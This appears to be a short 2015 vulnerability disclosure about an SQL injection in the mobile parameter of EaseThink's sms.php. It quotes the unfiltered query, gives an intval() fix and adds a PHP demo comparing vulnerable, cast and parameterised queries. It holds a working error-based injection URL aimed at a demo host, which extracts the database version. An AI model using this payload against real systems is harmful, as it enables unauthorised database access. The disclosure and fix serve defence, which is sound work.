Source: 自学PHP网 Date: 2015-04-17 10:15
In sms.php the mobile number is passed into the database query without any filtering, which results in SQL injection.
    if($_REQUEST['act']=='subscribe')
    {
        $tmpl->display("sms_subscribe.html");
    }
    elseif($_REQUEST['act']=='do_subscribe')
    {
        // start sending the verification code
        if(check_ipop_limit(get_client_ip(),"sms_send_code",intval(app_conf("SUBMIT_DELAY"))))
        {
            $mobile = trim($_REQUEST['mobile']);
            $verify = md5(trim($_REQUEST['verify']));
            $session_verify = $_SESSION['verify'];
            if($verify!=$session_verify)
            {
                $result['type'] = 0;
                $result['message'] = $GLOBALS['lang']['VERIFY_CODE_ERROR'];
                ajax_return($result);
            }
            // $mobile is only trim()'d above, then concatenated straight into the SQL string
            $mobile_subscribe = $GLOBALS['db']->getRow("select * from ".DB_PREFIX."mobile_list where mobile='".$mobile."'");
No further commentary needed: it is obvious at a glance that there is no filtering at all.
Exploitation:
1. Request http://demo.easethink.com/sms.php?act=subscribe to obtain a verification code, then supply it as the verify value in the next step.
2. http://demo.easethink.com/sms.php?act=do_subscribe&verify=8069&mobile=111'and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)%23
Fix: pass the mobile parameter through intval() before it is used in the query.
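The injectable concatenation from sms.php beside the intval() fix the post suggests and a parameterised alternative, as an added example that is not code from the original post or the EaseThink code base. It assumes an in-memory SQLite table named mobile_list (name from the post, rows constructed here) and a hypothetical 11-digit number format check.

```php
<?php
// Added example, not code from the original post or the EaseThink code base.
// Shows the injectable concatenation from sms.php next to the intval() fix the
// post suggests and a parameterised query. Runs stand-alone on an in-memory
// SQLite table named mobile_list (name taken from the post, rows constructed).

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE mobile_list (id INTEGER PRIMARY KEY, mobile TEXT)");
$db->exec("INSERT INTO mobile_list (mobile) VALUES ('13800000000'), ('13900000000')");

// 1. The pattern from sms.php: the trimmed request value is spliced into the SQL
//    string, so a quote in the input ends the literal and the rest is parsed as SQL.
function lookup_vulnerable(PDO $db, string $mobile): array {
    $sql = "select * from mobile_list where mobile='" . $mobile . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// 2. The post's fix: intval() keeps only a leading integer, so quotes and
//    keywords never reach the query. Caveat: on 32-bit PHP an 11-digit number
//    exceeds PHP_INT_MAX, and leading zeros or a "+86" prefix are lost, so the
//    cast alone is not a complete validation of a phone number.
function lookup_intval(PDO $db, string $mobile): array {
    $sql = "select * from mobile_list where mobile='" . intval($mobile) . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// 3. Preferred fix: validate the format, then bind the value as a parameter so
//    the database never interprets user data as SQL. The 11-digit pattern is an
//    assumption for this example, not a rule from the post.
function lookup_prepared(PDO $db, string $mobile): array {
    if (!preg_match('/^1\d{10}$/', $mobile)) {
        return [];
    }
    $stmt = $db->prepare("select * from mobile_list where mobile = :mobile");
    $stmt->execute([':mobile' => $mobile]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed input: closes the string literal and appends an always-true clause.
$hostile = "111' or '1'='1";
foreach (['lookup_vulnerable', 'lookup_intval', 'lookup_prepared'] as $fn) {
    printf("%-17s hostile input -> %d row(s)\n", $fn, count($fn($db, $hostile)));
}
printf("%-17s valid input   -> %d row(s)\n", 'lookup_prepared', count(lookup_prepared($db, '13800000000')));
```

Only the vulnerable function returns every row for the hostile input; the intval() version and the prepared statement both return none, and the prepared statement still finds the legitimate number.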